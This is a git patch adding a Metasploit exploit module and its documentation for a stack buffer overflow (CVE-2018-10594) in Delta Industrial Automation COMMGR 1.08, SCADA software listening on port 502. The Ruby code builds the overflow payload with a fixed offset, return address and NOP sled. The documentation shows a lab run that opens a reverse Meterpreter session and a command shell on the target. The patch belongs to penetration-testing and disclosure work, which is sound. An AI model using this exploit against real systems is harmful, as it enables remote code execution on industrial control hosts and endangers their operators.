From 9ae17daf4604aa09d825e9c6e34f40ddb3b286ac Mon Sep 17 00:00:00 2001 From: Hubert Lin Date: Wed, 19 Sep 2018 15:02:07 +0800 Subject: [PATCH] Added exploit module for Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow --- .../windows/scada/delta_ia_commgr_bof.md | 67 +++++++++++++++++ .../windows/scada/delta_ia_commgr_bof.rb | 75 +++++++++++++++++++ 2 files changed, 142 insertions(+) create mode 100644 documentation/modules/exploit/windows/scada/delta_ia_commgr_bof.md create mode 100644 modules/exploits/windows/scada/delta_ia_commgr_bof.rb diff --git a/documentation/modules/exploit/windows/scada/delta_ia_commgr_bof.md b/documentation/modules/exploit/windows/scada/delta_ia_commgr_bof.md new file mode 100644 index 0000000000..6c31fded57 --- /dev/null +++ b/documentation/modules/exploit/windows/scada/delta_ia_commgr_bof.md @@ -0,0 +1,67 @@ +## Vulnerable Application + +Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US. + +## Verification Steps + + 1. Install Delta Industrial Automation COMMGR 1.08 + 2. Start `msfconsole` + 3. Do ```use exploit/windows/scada/delta_ia_commgr_bof``` + 4. Do ```set RHOST ``` + 5. Do ```run``` + 6. You should get a shell. :) + +## Scenarios + +### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1 + +``` +msf > use exploit/windows/scada/delta_ia_commgr_bof +msf exploit(windows/scada/delta_ia_commgr_bof) > show options + +Module options (exploit/windows/scada/delta_ia_commgr_bof): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOST yes The target address + RPORT 502 yes The target port (TCP) + + +Exploit target: + + Id Name + -- ---- + 0 COMMGR 1.08 / Windows Universal + + +msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64 +RHOST => 192.168.3.64 +msf exploit(windows/scada/delta_ia_commgr_bof) > run + +[*] Started reverse TCP handler on 192.168.3.150:4444 +[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes... +[*] Sending stage (179779 bytes) to 192.168.3.64 +[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700 + +meterpreter > sysinfo +Computer : TEST01 +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows +meterpreter > shell +Process 932 created. +Channel 1 created. +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit +exit +meterpreter > exit +[*] Shutting down Meterpreter... + +[*] 192.168.3.64 - Meterpreter session 1 closed. Reason: User exit +msf exploit(windows/scada/delta_ia_commgr_bof) > +``` diff --git a/modules/exploits/windows/scada/delta_ia_commgr_bof.rb b/modules/exploits/windows/scada/delta_ia_commgr_bof.rb new file mode 100644 index 0000000000..bfbece1252 --- /dev/null +++ b/modules/exploits/windows/scada/delta_ia_commgr_bof.rb @@ -0,0 +1,75 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial + Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially + crafted packets. This module has been tested successfully on Delta Electronics Delta + Industrial Automation COMMGR 1.08 over + Windows XP SP3, + Windows 7 SP1, and + Windows 8.1. + }, + 'Author' => + [ + 't4rkd3vilz', # PoC + 'hubertwslin' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '44965'], + [ 'CVE', '2018-10594'] + ], + 'Payload' => + { + 'Space' => 640, + 'DisableNops' => true, + 'BadChars' => "\x00" + }, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'COMMGR 1.08 / Windows Universal', + { + 'Ret' => 0x00401e14, # p/p/r COMMGR.exe + 'Offset' => 4164 + } + ], + ], + 'DisclosureDate' => 'Jul 02 2018', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(502) + ]) + end + + def exploit + data = rand_text_alpha(target['Offset']) + data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled + data << [target.ret].pack("V") + data << make_nops(40) + data << payload.encoded + + print_status("Trying target #{target.name}, sending #{data.length} bytes...") + connect + sock.put(data) + disconnect + end +end +